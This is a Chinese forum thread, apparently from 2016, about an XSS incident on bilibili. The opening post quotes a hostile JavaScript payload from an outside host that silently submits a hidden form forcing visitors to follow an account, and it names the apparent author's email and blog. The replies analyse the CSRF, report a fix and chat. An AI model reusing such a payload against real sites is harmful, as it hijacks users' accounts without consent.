这是一个创建于 3558 天前的主题,其中的信息可能已经有所发展或是发生改变。
 |
1
yksoft1 OP http://xbilibili.3990577.com/xbilibili.js
var strhtml = ''; if (self != top) { strhtml += '<form id="xbilibili" action="http://space.bilibili.com/ajax/friend/AddAttention" method="post">'; strhtml += '<input type="text" name="mid" value="4926267" />'; strhtml += '</form>'; $(document.body).append(strhtml); $("#xbilibili").submit(); }else{ strhtml = '<iframe src="http://message.bilibili.com/#whisper/rid216246424b93bed4331ba30d5c0371d1" style="display: none"></iframe>'; $(document.body).append(strhtml); } 不仅试图强行加关注,还试图另外开一个 iframe 域名 whois 里面出来一个 email, [email protected] 自称黑客还给 TX 交 VIP 。。。 这个 email 查可以查到一个博客 http://www.hackblog.cn/ |
 |
2
virusdefender 2016-02-04 01:35:37 +08:00
这个 xss 看着并没成功,但是楼上贴的 js 貌似暴露了一个 csrf
|
 |
3
BROWNURSIDAE 2016-02-04 01:36:47 +08:00
那个 meiliwang110 我认识
|
 |
4
aprikyblue 2016-02-04 08:25:19 +08:00
坐等 “我就是那个 meiliwang110 ” 系列
|
 |
5
ragnaroks 2016-02-04 09:01:02 +08:00
a 站也是
|
 |
6
SourceMan 2016-02-04 09:30:43 +08:00
微博可以换私信界面的皮肤啦?
|
 |
7
RIcter 2016-02-04 09:37:06 +08:00
|
|
8
RIcter 2016-02-04 09:39:25 +08:00
..这个人我还见过,之前一起在杭电打比赛..233((
|
 |
9
erevus 2016-02-04 10:24:48 +08:00
是的 已经修补好了.
所以问题来了,同样是 Java 为什么别人家的修复方式不会导致中文乱码也不会导致程序效率低呢? |
 |
10
luoisnotgod 2016-02-04 13:01:22 +08:00 via iPhone
@yksoft1 首先我没自称黑客啊。。那个 js 其实不是试图 iframe ,是因为跨域请求的问题。目的是强行加关注。
|
|
11
luoisnotgod 2016-02-04 13:02:03 +08:00 via iPhone
@RIcter 哥,哪里中二了,你说我改。。
|
 |
12
zander 2016-02-04 13:09:33 +08:00
得,正主来了。
|
 |
13
yexm0 2016-02-04 13:16:24 +08:00 via Android
世界真细小
|
 |
14
yangff 2016-02-04 13:53:06 +08:00
“这个 XSS 本来是内部安全测试时候发现了,已经修好的。但是上周开发手贱回滚版本了,然后上周又被我发现了。他说这个星期二上新版本修复这个问题...不说了,我去切他 JJ...”
哈哈哈哈哈 |
|
15
RIcter 2016-02-04 14:09:36 +08:00 via iPhone
@luoisnotgod 233 ,博客主题
|
|
16
luoisnotgod 2016-02-04 14:28:24 +08:00 via iPhone
@RIcter 好吧,晚上就改。当初纯属为了 seo ,就一直没大改过。我加你 qq 了。
|
 |
17
hcymk2 2016-02-04 14:45:32 +08:00
@luoisnotgod
那个博客名字的字体别改 我觉得蛮好的. |
 |
18
karjarjam 2016-02-04 15:59:12 +08:00
@luoisnotgod 求博客名字字体
|
Select Language